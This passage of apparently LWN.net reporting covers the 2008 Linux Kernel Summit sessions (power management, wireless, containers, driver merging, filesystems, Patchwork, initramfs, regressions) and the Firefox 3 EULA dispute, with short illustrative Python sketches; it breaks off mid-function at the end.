claim that ACPI is the only kernel subsystem which knows how many bugs it
has.
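
The caveat about the suspend/resume category matters for how large the
improvement really is.  A quick calculation with the figures quoted
above (the variable names are just labels for this sketch):

```python
open_2004 = 222                # unresolved ACPI bugs in 2004
open_now = 59                  # unresolved ACPI bugs today
moved_to_suspend_resume = 45   # bugs pushed out to the separate category

# Add the moved bugs back so both years count the same kind of bug.
comparable_now = open_now + moved_to_suspend_resume
print(comparable_now)                                         # 104

headline_drop = 100 * (open_2004 - open_now) / open_2004
comparable_drop = 100 * (open_2004 - comparable_now) / open_2004
print(round(headline_drop), round(comparable_drop))           # 73 53
```

So the backlog has fallen by roughly half on a like-for-like basis,
rather than by the nearly three quarters that the raw numbers suggest.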

There was some talk of the TI OMAP/ARM architecture which, after some
effort, is now running entirely on current kernel releases.  The flow of
patches back upstream is still small, though, and needs improvement.  Even
suspend and resume work for this architecture, but they are too slow for
current needs.

USB autosuspend was mentioned briefly.  It works, except for the systems
which it breaks completely.  As a result, it is currently disabled by
default.  That, says Len, is an unfortunate situation; disabled-by-default
code, in many cases, might as well have never been written.

Wireless networking

John Linville summarized the wireless networking summit, also held in
Ottawa.  One topic of interest is the cfg80211 API, a wireless
configuration interface which is intended to replace the much-maligned
wireless extensions interface.  One idea being considered is to use DBus to
carry cfg80211 messages, which currently travel via netlink.  That change
would require putting a DBus implementation into the kernel itself, which,
says John, might not be quite as crazy as it sounds.

The wireless regulatory
framework was covered briefly.

Power management is an issue for wireless networking as well.  The wireless
protocols allow a device to announce its intention to go to sleep for a
while; the access point will then buffer packets until the interface wakes
up again.  Linux needs support for this feature, as well as for some more
basic things.  The mac80211 layer, for example, still lacks support for
suspend and resume.
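
The buffering behavior described above can be illustrated with a toy
model.  This is a sketch of the idea only: the class and method names
are invented, and details of the real protocol (such as how an access
point advertises that traffic is waiting) are left out.

```python
from collections import deque


class AccessPoint:
    """Toy access point that holds packets for sleeping stations."""

    def __init__(self):
        self.asleep = set()
        self.buffered = {}     # station -> queue of held packets
        self.delivered = []    # (station, packet) in delivery order

    def station_sleeps(self, station):
        """The station has announced that it is going to sleep."""
        self.asleep.add(station)
        self.buffered.setdefault(station, deque())

    def send(self, station, packet):
        """Deliver at once if the station is awake, else hold the packet."""
        if station in self.asleep:
            self.buffered[station].append(packet)
        else:
            self.delivered.append((station, packet))

    def station_wakes(self, station):
        """Flush everything held for the station, oldest packet first."""
        self.asleep.discard(station)
        queue = self.buffered.pop(station, deque())
        while queue:
            self.delivered.append((station, queue.popleft()))


ap = AccessPoint()
ap.send("laptop", "p1")
ap.station_sleeps("laptop")
ap.send("laptop", "p2")
ap.send("laptop", "p3")
print(ap.delivered)    # [('laptop', 'p1')]
ap.station_wakes("laptop")
print(ap.delivered)    # [('laptop', 'p1'), ('laptop', 'p2'), ('laptop', 'p3')]
```

The radio can stay powered down between bursts of traffic without
losing packets, which is where the power savings come from.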

Vendor support is getting better, especially with Atheros hiring a
community developer and beginning to contribute to the ath9k driver (though
not, yet, to the older ath5k driver).  Broadcom, on the other hand, remains
as uncooperative as ever.

There will be another wireless networking summit held in the next year,
almost certainly in Europe.

Containers

The final topic of the session was containers.  Several developers in this
area got together to talk about outstanding issues.  Namespaces in general
were dealt with quickly; there are no real changes planned in this area.
On the other hand, the group decided to shift the checkpoint/restart
functionality over to a "one big syscall" approach; that work has since
been covered in this
article.  The checkpoint developers are still working on getting a
simple case - checkpointing a single process with no outstanding signals or
other complicated situations - working before dealing with the more complex
issues. 

The biggest area of interest would appear to be in resource management -
the general task of keeping containers within a set of resource usage
boundaries.  The biggest problems in this area appear to be in the control
group interface.  The current interface does not offer any sort of
transactional semantics, and it is hard for user-space administrative
processes to learn about resource-oriented events.  Some of these problems
may be addressed via a new FIFO attached to each control group.

There is a lot of work going into I/O bandwidth controllers.  Too much
work, in fact; there are four independent implementations circulating and
they do not appear to be converging.  Some sort of consensus on the way
forward will need to be reached, but it is not, yet, clear what that
consensus will be.  Other work in progress includes a swap controller
(which will be merged with the memory controller), the beginning of a
network traffic controller, and some early effort toward a user-space
library for working with control groups.

A member of the group asked whether the memory controller still requires
the addition of a pointer to the page structure.  The kernel keeps
a page structure for every page of memory; there are a lot of
these structures, so struct page may be one of the most ruthlessly
compressed data structures in the system.  Adding a new pointer is not a
price that the developers will willingly pay.  Balbir Singh replied that
this pointer is still there for now, but there is a patch which removes
it.  The problem is that this patch comes with a 4% performance loss; work
toward lessening that impact continues.
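
To put the cost of that pointer in perspective, here is a rough
back-of-the-envelope sketch.  It assumes 4KB pages and 8-byte (64-bit)
pointers, neither of which was specified in the discussion, and the function
name is purely illustrative.

```python
def pointer_overhead_bytes(ram_bytes, page_size=4096, pointer_size=8):
    """Extra memory used by adding one pointer to every page structure.

    page_size and pointer_size are assumptions (4KB pages, 64-bit
    pointers); other configurations will give different numbers.
    """
    pages = ram_bytes // page_size      # one page structure per page
    return pages * pointer_size


GiB = 1024 ** 3
MiB = 1024 ** 2

# A 4GB system has 1,048,576 pages, so one extra pointer costs 8MB.
overhead = pointer_overhead_bytes(4 * GiB)
print(overhead // MiB, "MiB")
```

Under those assumptions the overhead works out to about 0.2% of memory,
paid on every system whether or not the memory controller is in use.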

		KS2008: When should drivers be merged?


The rough consensus in the kernel development community over the last
couple of years has held that device drivers should be merged into the
mainline as soon as possible.  Even if these drivers have significant
problems, it is better to get them into the mainline where they are more
likely to be fixed.  This approach was reconsidered at a Kernel Summit 2008
session, but the group left the policy essentially unchanged.

There are two fundamental lines of thought on this subject.  James
Bottomley started off the session with his feeling that the time before
merging presents the best opportunity to get driver authors to improve
their work.  The possibility of merging the code provides a motivational
incentive which vanishes once the code goes in.  So James likes to hold
code submissions out of the mainline until the worst problems have been
addressed. 

On the other hand, Arjan van de Ven doesn't like the idea of "holding code
hostage" in this way.  From this point of view, about the only reason to
hold drivers out of the mainline is obvious security or user-space API
problems.  In the absence of those, getting the code merged into the
mainline, where it will be more accessible for others to fix, is the best
way to improve bad drivers.

Linus is clearly in the second camp.  Drivers which are out of the mainline
tree, he says, simply do not get better.  People just do not spend much
time looking at out-of-tree code.  Additionally, not accepting drivers from
vendors may put us into a position of having no real traction with those
vendors; each of their subsequent drivers will have the same problems.  By
getting those drivers into the tree and fixing them, we may be able to
push them toward producing better code.  Otherwise, says Linus, we may be
"shooting ourselves in the foot."

On the other hand, Greg Kroah-Hartman reported some strong successes with
his linux-staging tree.  That tree currently hosts some 15 drivers, most of
which are steadily improving over time.  Being in linux-staging is
apparently enough to draw some attention to a driver, and that helps to get
it into better shape.

Much of the discussion was devoted to an attempt to set a line dividing
drivers which can be merged from those which cannot.  There was not a whole
lot of success, though.  It really appears to be a case-by-case sort of
problem.  For example, what about one vendor driver which reads a
configuration file directly from /etc?  Such behavior is normally
frowned upon.  But, if the driver is already out there and being used,
putting it into the mainline will not make things worse - we already have
the problem.  So, especially when the driver is already in widespread use,
we might as well just merge it.

Some ways of mitigating problems with drivers were discussed.  Some of the
worst behaviors could be configured out, allowing the merging of a barely
functional driver which can then be improved in place.  Really nasty
drivers can set a taint bit in the kernel as a warning to developers trying
to track down bugs on the affected systems.  Another idea involves
outfitting badly-written drivers with strong warnings to keep
other developers from copying the code found therein.

It was suggested that the distributors could ship drivers from the
linux-staging tree, perhaps with the taint feature added.  The answer to
that was that, if the drivers are being shipped by distributors, they might
as well be in the mainline.  Linus stated that anything the distributors
ship should really be merged as well.  There are practical difficulties,
though; Fedora ships the Nouveau driver, which still has not committed to a
stable user-space API.  Until that API stabilizes, Nouveau cannot be merged
into the mainline, but there is still value in getting the driver tested by
Fedora users.

There were a few conclusions from the discussion.  The taint flag for
substandard drivers will probably be added.  There might be a
drivers/staging directory for such drivers as well.  Greg will
take responsibility for getting some of those linux-staging drivers into
the mainline; he has, it was suggested, just become the official crap
maintainer.

		Firefox 3 EULA raises a ruckus


End User License Agreements—or EULAs—are a mainstay of the
proprietary software world that tend to rub free software advocates the
wrong way.  When a EULA is presented in a click-through window as part of
the initial execution of a program, it can really raise some ire,
as Mozilla is finding out.  Its plan to present a click-through
license for Firefox 3 on Linux has not met with widespread approval; quite the
reverse in fact.


The issue has been kicking around since at least
last May, when Fedora folks noticed that Firefox 3 builds moved the EULA popup
window from the installer—which Linux folks rarely see—to the
first time Firefox is run.  More recently the issue erupted in the Ubuntu
community when a user filed a
bug
that reads, in part:

STARTING UP A CERTAIN 3.0.2 VERSION OF FIREFOX BROWSER MAKES AVAILABLE TO
YOU A VERY CAPITAL END USER LICENSE AGREEMENT. THIS AGREEMENT IS OBNOXIOUS
and largely irrelevant to Ubuntu users. 


The predictable outcry followed, mostly because people who are used to free
software have a visceral reaction to seeing a click-through EULA.  For that
reason alone it is a poor choice by Mozilla, at least on Linux.
Windows users, who make up a substantial portion of the Firefox userbase, are
generally unfazed by EULAs as they are confronted by them
regularly—generally blithely clicking through with little or no
hesitation. 


There are a number of objections to the Mozilla EULA, starting with the current
text of the license.  Mozilla Corporation chairperson Mitchell Baker agreed
with the critics of the license text, saying "the most important
thing here is to acknowledge that yes, the content of the license
agreement is wrong."  New
license text is now available in draft form, but it still doesn't
address an underlying issue: do we need to consult a lawyer when we install
or run 
free software?


One of the guiding principles of free software is that it doesn't limit
what "end users" can do with the software, it only limits those who wish
to distribute it.  When a page or two of legalese—undoubtedly toned
down from what the lawyers would really like—is presented to a
new user, what exactly are they supposed to do with it?  Users have rights
under free software licenses, and it is important that they can find out
about them, but it is fairly rare for a program, or even a distribution, to
require a user to click through a copy of the license.


Mozilla's position is that they need to protect their trademarks as well as
inform users about the web services used to try to detect phishing and
malware sites.  In answer to those who think a click-through EULA is
unnecessary—often using Linux distributions as a
counterexample—Baker points
out: 

It's hard to tell what's "necessary." It's an unsettled area and may
vary across different locales. We've traditionally been more conservative
on this point than many Linux distros.


So far, Mozilla does not seem willing to budge from its requirement to show
the EULA as a click-through agreement.  Fedora was able to get a waiver of
sorts for Fedora 9 which allowed shipping Firefox 3 without the EULA while
the projects worked out language they both could live with.  In Fedora 9,
Firefox opens to a page
that describes the web services when it is run for the first time.
Some kind of compromise along these lines for Linux distributions would
seem to satisfy most of the concerns for both sides, but other than for
Fedora 9, that solution has not been blessed by Mozilla.


Fedora Engineering
Manager Tom "spot" Callaway has an excellent overview of the history
as well as a nice analysis of the EULA.  He 
notes that almost all of the terms in the EULA are either covered by
applicable 
laws or by the Mozilla Public License (MPL).  None of that really matters
though as distributions really only have two choices as outlined
by Ubuntu leader Mark Shuttleworth:

Mozilla Corp asked that this be added in order for us to continue to call
the browser Firefox. Since Firefox is their trademark, which we intend to
respect, we have the choice of working with Mozilla to meet their
requirements, or switching to an unbranded browser. 


That is the risk that Mozilla takes; if it is too heavy-handed in what it
requires to call a browser "Firefox", distributions will take the code
without the trademarks and call it "Iceweasel" as Debian has
or "abrowser" which is the Ubuntu equivalent.  The Iceweasel "fork" was
made because 
Mozilla objected to Debian backporting security fixes into older browsers
without its consent, while abrowser has come about because of the EULA
issue.  Given that Linux users were some of the earliest and most
enthusiastic adopters of Firefox, it is truly unfortunate that
many may have to run it under other names.


There is an issue that may be getting lost in the shuffle here as well.
Fedora board member Jef Spaleta has expressed concerns
about how to notify users about web services:

"We" as in everybody doing open source software has absolutely no fraking
idea as to how to appropriately notify users about the services agreements
associated with on-by-default web services. "We" collectively aren't giving
it a lot of thought. "We" have this amorphous concept about the online
desktop experience which is going to deeply integrate web services and
enhance the day-to-day desktop user experience. But that enhancement comes
at a cost..and that cost is the complication associated with "terms of
service" for a vast array of different web service vendors.


Web services clearly bring along a number of additional concerns.  There
are privacy issues to consider.  In many places, particularly Europe, there
are fairly stringent 
requirements regarding data collection and retention that are required to
be communicated to users.  How that will be done for free software that uses
these services is an open question.  As Spaleta points out, Mozilla may be
the only 
free software organization that is even looking at the problem.


The EULA mess is a situation that certainly could have been handled better by
Mozilla.  One hopes that some kind of compromise can be worked out so that
users aren't poked in the eye with legal documents—that aren't even
valid in many jurisdictions—and distributions don't feel like they
need to fork to preserve their freedoms.  Mozilla definitely has some
legitimate interests to protect, but it needs to find a saner way to do
that. 


There is hope that this is happening, as Baker has described in an update
on her blog:

We've come to understand that anything EULA-like is disturbing, even if
the content is FLOSS based.  So we're eliminating that.  We still feel
that something about the web services integrated into the browser is
needed; these services can be turned off and not interrupt the flow of
using the browser. We also want to tell 
people about the FLOSS license — as a notice, not as as EULA or use
restriction.  Again, this won't block the flow or provide the unwelcoming
feeling that one comment to my previous post described so eloquently.


More details are imminent, but it looks like this could all resolve amicably.

		The 2008 Linux Kernel Summit


The 2008 Linux Kernel Summit was held September 15 and 16 in
Portland, Oregon, immediately prior to the Linux Plumbers Conference.  At
this invitation-only meeting, some 80 developers discussed a number of
issues relevant to the kernel and its future development.  The following
reports were written by Jonathan Corbet, who attended the event and was a
member of its program committee.

This reporting was sponsored by LWN's subscribers; if you appreciate this
kind of content, please consider subscribing to
LWN and helping us create more of it.

Day 1

The sessions held on the first day were:


 Linux 3.0: should the developers 
     do a Linux 3.0 release with a focus on dumping older, unneeded code?

 Minisummit reports: reports from
     gatherings of power management, wireless networking, and containers
     developers.

 When should drivers be merged?  A
     wide-ranging discussion on the trade-offs between getting drivers into
     the kernel quickly and waiting until they are up to kernel coding
     standards. 

 Filesystem and block layer
     interaction; what contemporary file systems need to be able to get
     the most out of storage devices.

 Cross-subsystem issues; how do we
     evolve subsystems which are heavily used by several other parts of the
     kernel? 

 Tools, and the new Patchwork tool in
     particular. 

 Bootstrap code.  Why does every
     distributor throw together its own initrd/initramfs code, and can that
     situation be improved?

 Kernel quality and release process,
     various discussions on how to produce better kernels and a
     near-decision to move to a one-week merge window.


Day 2


 Tracing.  A lengthy discussion on 
     user requirements for kernel tracing and how those requirements might
     eventually be met.

 Documentation.  We always want more
     and better documentation, but what documentation would be most useful
     to the development community?

 There was a brief bug-fixing session aimed at the top entries on
     KernelOops.org.  Over the course
     of half an hour, the developers were able to fix 13 of the top 14
     bugs.  It was widely agreed that this was a productive use of time
     which will probably be repeated at future events.

 More minisummit reports covering
     virtualization, networking, and kernel bloat.

 All about threads; kernel thread pools
     and threaded interrupt handlers in particular.

 Projects with large user-space
     components; how can we make it easier for the direct rendering
     infrastructure project to work with the mainline kernel?

 Rafael Wysocki led a session on the new suspend/resume
     infrastructure.  Most of that talk was concerned with the API, which
     was covered here back in
     March, so it will not be written up again now.  Some changes will
     likely be made; stay tuned to LWN for the details.
     
     Linus did ask the crowd how many people were still unable to suspend
     their laptops.  The number of hands raised was quite small; things
     have clearly gotten better in this area.

 Fixing the Kernel Janitors Project.
     How can we do a better job of bringing new developers into the kernel
     community? 


The closing party (which was also the Linux Plumbers Conference opening
party) was the venue chosen for the annual election of members to the Linux
Foundation's Technical Advisory Board.  The move out of the regular kernel
summit sessions was intended to allow a wider group of people to
participate in the election.  It would appear to have been successful in
that regard; there were record numbers of both candidates and voters.  The
board members elected this time around were James Bottomley, Kristen
Carlson Accardi, Chris Mason, Dave Jones, Chris Wright, and Christoph
Hellwig.  Christoph was elected to a one-year term; all of the others will
serve two-year terms.


Next year's kernel summit is currently scheduled for October 18 to 20
in Tokyo, Japan.

		KS2008: Filesystem and block layer interaction


Much is happening with Linux filesystems currently; this is a situation
which is likely to persist for some time.  As filesystems develop, it is
becoming clear that there need to be some changes in the interactions
between the filesystem and block I/O layers.  This kernel summit session
discussed some of the places where changes are needed, but did not get much
into their implementation.

Chris Mason is the lead developer of the up-and-coming btrfs filesystem.
One of the items on Chris's shopping list is a way for filesystems to
obtain a better understanding of the topology and nature of the storage
system underneath them.  He would like, for example, to be able to
determine whether a filesystem is sitting on a solid-state device or on a
traditional rotating disk.  Certain decisions will be made very differently
depending on the nature of the underlying device; filesystems stored on
solid-state drives, for example, can be laid out without being concerned
about seek times.

The topology of the device also matters.  Especially when multipath storage
systems are in use, the filesystem would like to be able to understand what
the various paths are, and to be able to partition the storage into truly
independent failure domains.  With this information, filesystems can find
the optimal ways to perform I/O to the underlying devices.

Information needs to flow the other way as well.  Upcoming filesystems will
perform extensive checksumming on data, so they will be able to inform the
storage layer when a block has gone bad.  For mirrored devices, that will
enable the storage driver to recover the block from an uncorrupted mirror -
if the filesystem is able to tell it which mirror went bad.

Chris asked for information on storage latency - how long operations
can be expected to last - and the optimal I/O sizes and alignments.  The
motivation behind this request is to optimize I/O to solid-state devices.
Here Linus jumped in and suggested that the filesystem developers should
"take a deep breath and wait a year."  Solid-state devices will change a
lot over that time, and many of the problems which exist now will be gone
by then.  So filesystems designed for today's solid-state drives will
contain a lot of useless code by the time those drives are truly
widespread.  It is better, Linus says, to just treat them as fast,
random-access disks and not worry about the details.

Another request was for filesystems to be able to allocate their own
bio structures, rather than using the block layer's allocation
functions.  That would allow the filesystems to store their own private
data with the bio without the need to tack on a chain of separate
structures via the bi_private pointer.  There's also a general
need to rework the address space 
operations to facilitate better layout and more rational locking.

The kswapd process is a bit of a problem for contemporary filesystems.
Kswapd is charged with freeing up pages for the memory allocator; it needs
to be able to get its job done at times when system memory is very tight.
Currently kswapd will attempt to write out dirty pages so that they can be
freed.  The problem is that this writeout can require more memory to carry
out; as filesystems become more complex, the amount of extra memory needed
seems to be growing.  That can lead to deadlocks if that extra memory is
not available.  So the filesystem developers would like kswapd to concern
itself exclusively with clean pages, which can be freed without performing
I/O.

One answer that came back was that the writepage() VFS callback
can be treated as advisory.  That is what btrfs does now; if a
writepage() call comes in the context of a process with the
PF_MEMALLOC bit set (meaning that the system is trying to free
memory), the call will simply fail.  That is all legal, but it can hurt
performance.  

In the end, kswapd does writeout because, historically, it was possible for
a Linux system to end up with all of its pages being dirty.  In that kind
of situation, writeout is the only way to make memory available again.  But
current kernels are able to keep close tabs on how much of memory is dirty
at any given time, and they can avoid getting into that kind of situation.
So writeout in kswapd is no longer necessary; it can, instead, be handled in
contexts where memory is not in critically short supply.  This change
seems likely to be made in the near future.

The final topic, discussed briefly, was I/O barriers.  The filesystem
developers would really like it if the more complex storage layers - such
as the software RAID and device mapper code - would implement write
barriers.  That is a hard thing to do with the current concept of barriers,
though; the performance costs will be high.  James Bottomley noted that a
better job could be done with a more complex barrier API.  But it is not
clear whether the benefits that would come would be worth the extra cost.

		KS2008: Cross-subsystem interactions


Jean Delvare has an interesting job: he is the maintainer of the i2c
subsystem.  Most users don't think much about i2c devices, but kernel
developers involved with a number of subsystems are well aware of them.
For example, a webcam driver is often three drivers internally: one for the
camera controller, one for the camera itself, and one for the i2c
connection which allows the host system to configure the camera.  There are
i2c buses lurking within a number of other devices, so the i2c layer pops
up in a number of places.  Thus, changes to the i2c layer affect quite a
few developers in other parts of the kernel.

Jean talked about some of the lessons he has learned over the years.  It is
necessary to cleanly separate the subsystems.  In each case, developers
need to know the subsystems their code works with and the associated
maintainers; that knowledge will make it much easier to get changes
accepted.  All subsystems should be treated equally, and subsystem
maintainers should be warned about changes as early as possible.  It is
best to work with those maintainers to chart out a path which makes the
changes as easy as possible for everybody to deal with.

So where do the problems come in?  The universal answer was API changes,
especially when there are disagreements over how an API should look.
Linus pointed out that disagreements often come about when the
maintainership boundaries are unclear.  There is, for example, a lot of
architecture-specific code which is essentially part of the PCI layer,
leading to conflicts between architecture and PCI maintainers.  Sometimes
the only real solution is to refactor the code - not a simple or quick
process. 


Nick Piggin talked about problems getting maintainers to accept new APIs.
Part of his difficulty seems to stem from his idea that, when an API needs
to change, the maintainers of affected subsystems should do the work of
adjusting to the change.  Strangely enough, people tend to react poorly
when others create more work for them.  Still, Nick would like subsystem
maintainers to help out when an API change needs to happen.  A developer
who fixes a buggy API should be rewarded; forcing that developer to fix all
users of the affected API seems, instead, like punishment.

Linus disagreed with that reasoning, though.  He noted that there is a lot
of code in the kernel which is effectively unmaintained; there is nobody
else who can take on the work of fixing it when an API changes.  And, he
says, some developers are far too eager to make API changes.  Anything
which causes them to hesitate, and to maybe think about how to minimize the
pain caused by the change, is a good thing.

There were no real conclusions from this session; having said their piece,
the developers moved on to the next topic.

		KS2008: Development tools


Paul Mackerras was the leader of a kernel summit session dedicated to
development tools.  In the end, though, only one tool was discussed: the Patchwork system used by the
PowerPC development community.  Patchwork is a patch management system; its
job is to ensure that posted patches are properly tracked, reviewed, and
disposed of.

The Patchwork system can be configured to watch a mailing list; whenever a
message containing a patch is posted, it is added to the database.  Any
followup discussion is also captured and stored with the patch.
Maintainers can go into the system, review patches, delegate them to other
maintainers, and mark them for their final destination.  Patches which are
set to be merged into a subsystem tree can be grouped into bundles; the
maintainer can then extract them as a mailbox file suitable for feeding to
the git-am tool.

A nice feature of Patchwork is that it can recognize messages containing
Acked-by lines and automatically note the acks in the original
patch.
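
As a minimal sketch of how that sort of recognition might work (this is
not Patchwork's actual code, and the function names and the dictionary
used as a patch record are hypothetical), a tracker could scan each
follow-up message for unquoted Acked-by lines and attach them to the patch:

```python
import re

# Match "Acked-by:" only at the very start of a line, so that quoted
# copies ("> Acked-by: ...") in later replies are not counted again.
ACK_RE = re.compile(r"^Acked-by:[ \t]*(.+?)[ \t]*$", re.MULTILINE)


def find_acks(message_body):
    """Return the text following each unquoted Acked-by: line."""
    return ACK_RE.findall(message_body)


def record_acks(patch, reply_body):
    """Add any acks found in a follow-up message to a patch record.

    'patch' is a hypothetical record: a dict with an 'acks' list.
    """
    for ack in find_acks(reply_body):
        if ack not in patch["acks"]:
            patch["acks"].append(ack)
    return patch


reply = (
    "Looks fine to me.\n"
    "\n"
    "Acked-by: Jane Hacker <jane@example.org>\n"
    "> Acked-by: Somebody Quoted <quoted@example.org>\n"
)
patch = {"subject": "[PATCH] fix frobnication", "acks": []}
record_acks(patch, reply)
print(patch["acks"])
```

Anchoring the match to the start of the line is a design choice made for
this sketch; a real tool would have to decide how to treat quoted or
indented tags.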

Patchwork was generally recognized as a useful tool; the developers began
discussing whether it should be used for the kernel as a whole.  It was
noted that all maintainers need to commit to using it, or it will quickly
clog up with patches that nobody is paying attention to.  Nobody has any
illusions that all kernel developers can be convinced to start working with
this new tool; Andrew Morton stated that he was probably too stuck in his
ways to make use of it.  Some alternatives - such as having patches
automatically age out of the system - were discussed.  But it was generally
agreed that trying to deal with the full linux-kernel mailing list would
probably be too big of a step at this time.

So a more likely outcome is that one or more subsystems will start
experimenting with Patchwork, perhaps running it on one of the kernel.org
systems.  The SCSI or ext4 subsystems may be the early adopters here.  If
that trial works out, expanding the use of Patchwork may be considered.

		KS2008: Bootstrap code


Initramfs is a useful tool; it allows a filesystem (in cpio format) to be
tacked on to the end of the kernel executable image.  When the kernel
boots, it unpacks the filesystem into RAM and mounts it as the initial root
filesystem.  Therein will be found enough bootstrap code to get the system
properly initialized and running from the real root filesystem.  It is
possible to boot a system without an initramfs, but essentially all
distributors make use of this facility.

Dave Jones, the Fedora kernel maintainer, made the claim that the initramfs
code is one of the most boring parts of any distribution.  Even so, all
distributors still roll their own initramfs code.  It is a pain, and it
doesn't make any sense.  So Dave looked into what's going on in this code
to see if the situation could be made any better.

The Red Hat initramfs image, used in Fedora, is the product of many years'
worth of heritage and workarounds.  Whenever the developers have run into
an early bootstrap problem, they have thrown another hack into the
initramfs code to make things work again.  This code is ugly, but nobody
wants to switch to anybody else's version.  They fear that a different
initramfs will lack all those hard-earned workarounds, and, besides,
everybody feels that their particular solution is the best.

So what does the initramfs code do?  Its job is to load any necessary
storage drivers, then wait for the storage devices to settle.  The swap
system needs to be enabled.  If the swap partition contains a hibernation
signature, a resume from disk operation is begun.  Otherwise the initramfs
code must find the root filesystem (an operation which may require setting
up the device mapper or getting networking going), mount it, then switch
over to the real operating system.  Red Hat's version has to support a wide
variety of root filesystems, and contains a lot of crufty code.  
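
The sequence described above can be sketched, very roughly, as follows.
This is only a model of the ordering and of the hibernation branch; the
function and parameter names are invented for illustration, and real
initramfs code is a set of scripts and small programs, not Python.

```python
def early_boot_steps(storage_drivers, swap_has_hibernation_image, root_needs):
    """Return the ordered list of actions an initramfs might perform.

    storage_drivers: names of driver modules to load (hypothetical)
    swap_has_hibernation_image: True if a hibernation signature was found
    root_needs: extra setup required to reach the root filesystem,
                e.g. ["device mapper"] or ["networking"]
    """
    steps = ["load driver " + name for name in storage_drivers]
    steps.append("wait for storage devices to settle")
    steps.append("enable swap")

    if swap_has_hibernation_image:
        # Resuming replaces the rest of the normal boot path.
        steps.append("resume from disk")
        return steps

    for prerequisite in root_needs:
        steps.append("set up " + prerequisite)
    steps.append("mount root filesystem")
    steps.append("switch to real root")
    return steps


for step in early_boot_steps(["ahci"], False, ["device mapper"]):
    print(step)
```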


The situation is pretty much the same with the other distributors.  Where
things differ, it often has to do with differing kernel configurations,
and, in particular, differences of opinion over whether specific code
should be built into the kernel or built as a module.

Differences between initramfs setups can create some annoying problems.  
Sometimes these differences are enough to cause some kernel configurations
to fail on one distribution.  It would make life easier for everybody if a
more uniform set of tools were used for early system initialization.  This
code could be part of the kernel tree, and it could change, when needed, in
response to kernel changes.  In the end, things would just work.

There are a few details that would have to be dealt with.  Some distributions
use the in-kernel hibernation (suspend-to-disk) code, while others are
using TuxOnIce.  It seems like maybe
it's time for everybody to standardize on one hibernation solution.  While
most distributions have long since switched over to the parallel ATA
drivers, some are still using the older IDE subsystem.  Not everybody
supports root filesystems on iSCSI devices.  And so on.  But these are
problems which should be amenable to a solution.

Dave is going to start by adding a "make mkinitrd" option to the kernel
build system; it will create a version of the Fedora mkinitrd for now.
Others will be encouraged to join in and help make it work for everybody.

Beyond that, Dave suggested that the developers could start to build a set
of reference boot scripts in the kernel.  Once again, this is an area where
distributors tend to roll their own code; they could benefit from bits of
code showing the best way to initialize parts of the system.  Al Viro
pointed out that there will be problems coming from the fact that different
distributors use different shells in their early boot code.  That led to an
extended discussion of the evils of nash and the celebrations which will
ensue upon its eagerly-awaited demise.

There was some brief discussion of klibc - a small version of the C library
intended for use in initramfs code.  That project has been stalled for some
time due to lack of interest; it could probably be restarted without too
much trouble.  The problem is that, despite all their wishes, distributions
often end up having to use glibc in their initramfs filesystems.  The
biggest driver here appears to be internationalization, which is not
properly handled by the various stripped-down libc implementations out
there.

Getting back to the concept of a uniform set of initramfs tools, Linus
suggested that the process could start with some baby steps.  The kernel
could include some bits of code which are automatically added into whatever
initramfs image the distributor provides.  There are challenges to making
that work too, of course.  The best way, perhaps, is just to dump
everybody's initramfs and start over with a new, clean version.  That
project may get underway before too long.

		KS2008: Kernel quality and release process


The first day of the 2008 kernel summit concluded with two sessions
dedicated to the quality of our 
kernels and the process used to produce them.  Arjan van de Ven started off
talking about the data acquired by the Kerneloops project.  In a short period of
time, Arjan has accumulated information from tens of thousands of kernel
crashes and warnings.  From that data, he is able to draw some conclusions
about how the kernel fails and how well the developers are doing at fixing
problems.

Initially, Kerneloops worked by grabbing oops reports from the kernel
mailing lists.  Since then, a number of distributors have added facilities
to find oops tracebacks in the kernel logs and ship them off to the project
(after obtaining confirmation from the user, of course).  This tool is now
the source of the vast majority (99%) of the oops reports in the system.
One of the things Arjan noted is that many of the biggest problems
encountered by users are never reported on the kernel mailing lists; the
problem reports one sees there are not indicative of what users are
actually running into.


At any given time, the top ten bugs account for a full 60% of the reports;
the top 25 make up 70%.  So, while there still appear to be many ways to
make a kernel crash, most user problems are caused by a very small number
of bugs.  Fix those problems, and most users will see their troubles go
away.  At the other end of the scale, almost half of the bugs are
represented by a single report.  While some of those reports will be the
result of obscure timing-related issues, most of them are more likely to be
the result of hardware problems.  So a lot of the reported problems do not
really require any action from the developers.
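The concentration Arjan describes can be measured directly from a list of report signatures.  What follows is a minimal sketch only; the function names and the sample data are invented for illustration and say nothing about how Kerneloops itself stores or analyzes its reports.

```python
from collections import Counter


def cumulative_share(report_signatures, top_n):
    """Fraction of all reports attributable to the top_n most-reported bugs."""
    counts = Counter(report_signatures)
    total = sum(counts.values())
    if total == 0:
        return 0.0
    top = sum(count for _, count in counts.most_common(top_n))
    return top / total


def singleton_fraction(report_signatures):
    """Fraction of distinct bugs which are represented by a single report."""
    counts = Counter(report_signatures)
    if not counts:
        return 0.0
    singles = sum(1 for count in counts.values() if count == 1)
    return singles / len(counts)


# Made-up sample: one signature per report received.
reports = ["bug_a"] * 6 + ["bug_b"] * 2 + ["bug_c", "bug_d"]
top_share = cumulative_share(reports, 1)
single_share = singleton_fraction(reports)
```

In this invented sample, one bug accounts for six of the ten reports, while two of the four distinct bugs were seen only once.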


A number of reported bugs result from the utrace code.  Utrace is an
out-of-tree tracing enhancement shipped by Fedora; it seems that, perhaps,
this code still isn't quite ready for prime time.  There are also quite a few
which are attributable to binary-only modules.


Linus asked how many developers get the occasional oops reports mailed out
by the project; maybe ten people raised their hands.  Linus would like to
see that report mailed to a lot more people, and the regression reports
too.  If this information got to more developers, perhaps more bugs would
get fixed.


Regressions

That was a natural point to move into a discussion of regressions led by
Rafael Wysocki.  Rafael put up a number of plots of regression counts and
associated fixes; by fitting a logarithmic function to regression reports
and a line to fixes, he was able to extrapolate the point where the two
curves intersect and, in theory, all regressions are fixed.  It turns out
that recent kernels have been released 1-3 weeks before this point is
reached.  According to his data, Rafael suggests that the optimal time to
release 2.6.27 would be in about three weeks.
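For the curious, this sort of extrapolation can be sketched in a few lines.  The code below is not Rafael's method or data; it assumes cumulative counts indexed by day number (starting at 1), fits a logarithmic curve to the reports and a straight line to the fixes with ordinary least squares, then bisects for the day on which the two curves meet.  All names and the sample numbers are invented.

```python
import math


def fit_line(xs, ys):
    """Least-squares fit; returns (intercept, slope) of y = intercept + slope * x."""
    n = len(xs)
    mean_x = sum(xs) / n
    mean_y = sum(ys) / n
    sxx = sum((x - mean_x) ** 2 for x in xs)
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys))
    slope = sxy / sxx
    return mean_y - slope * mean_x, slope


def crossover_day(days, reported, fixed, horizon=3650.0):
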